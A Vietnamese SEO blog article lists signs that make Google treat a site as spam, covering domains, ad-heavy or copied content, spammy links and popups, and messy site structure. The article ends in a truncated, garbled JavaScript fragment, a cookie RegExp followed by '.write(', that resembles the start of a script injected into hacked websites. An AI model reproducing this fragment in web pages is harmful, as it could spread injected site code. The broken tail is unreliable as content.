Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > SEO > Tránh Google “ghét” website của bạn

Tránh Google “ghét” website của bạn

Đã bao giờ bạn tự thắc mắc khi thấy website của mình không được google lập chỉ mục hoặc vẫn giữ mãi một vị trí mặc dù bạn đã sử dụng nhiều cách để quảng bá, SEO website của mình. Các thông số của bạn như: PR, số Index, tuổi đời domain …. đều hơn đối thủ nhưng bạn vẫn thấy họ vượt lên trước mình. Rất có thể website của bạn đã bị Google “ghét” và bị liệt vào dạng spam.

Bài viết này Pridio sẽ cùng các bạn nghiên cứu các điểm cần lưu ý để tránh trở thành “rác” trong mắt của google.

I. Nhận dạng qua tên miền.

– Những tên miền của các website rác thường rất dài, chúng chứa nhiều từ khóa có tính thương mại, lượt tìm kiếm lớn.

– Tên miền “rác” thường có chủ là những người đầu cơ tên miền, những người sở hữu nhiều tên miền khác. Và chắc hẳn họ không thể chăm sóc nội dung cho website sử dụng các tên miền “rác” này.

– Tên miền thường có đuôi lạ ít gặp như .cc, info hay .us

Và một tin buồn cho những webmaster sở hữu tên miền này là google đã giảm giá trị việc từ khóa có trong tên miền bằng update mới của thuật toán con gấu trúc (Google Panda).

dịch vụ seo

II. Các yếu tố liên quan đến nội dung.

– Website  rác thường có rất nhiều quảng cáo, nó gây khó chịu rất nhiều cho người dùng. Chính điều này đã vi phạm nguyên tắc quan trọng nhất của google: Win-Win-Win.

Nguyên tắc Win-Win-Win của google tức: Người dùng tìm thấy đúng thứ họ muốn bằng google, Google cung cấp thông tin chính xác nhất đến người dùng, Doanh nghiệp đưa thông tin đến đúng người dùng hơn nhờ google. Khi không đảm bảo được  nguyên tắc Win-Win-Win này thì chính Google cũng sẽ có nguy cơ bị các đối thủ khác vượt qua, họ sẽ nỗ lực cải tiến các thuật toán của mình nhằm loại bỏ các website spam và SEO Mũ đen.

– Các website rác thường bị trùng lặp nội dung với các website khác do webmaster của website đó chuyên đi copy lại nội dung của các website khác.

III. Link và cấu trúc website.

– Các website rác thường có chứa các liên kết đến các website rác khác. Đôi webmaster của chúng đặt popup đến một các website rác khác nhằm kiếm lượt truy cập, nhưng các popup này gây khó chịu cho người dùng. Chúng sẽ bị người dùng tắt ngay lập tức và khi đó tỉ lệ bỏ qua trên các website rác này tăng cao và điều tất yếu là bị đánh tụt hạng.

– Cấu trúc của các website rác nga từ khi thiết kế website thường rất thiếu khoa học với việc lập rất nhiều lớp thư mục, các bài viết và nội dung thường không được để trong đúng thư mục của chủ đề đó.

Nếu website của bạn đã bị google “ghet” và mang tiếng là website rác thì hãy tối ưu lại website của mình nhé.

(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘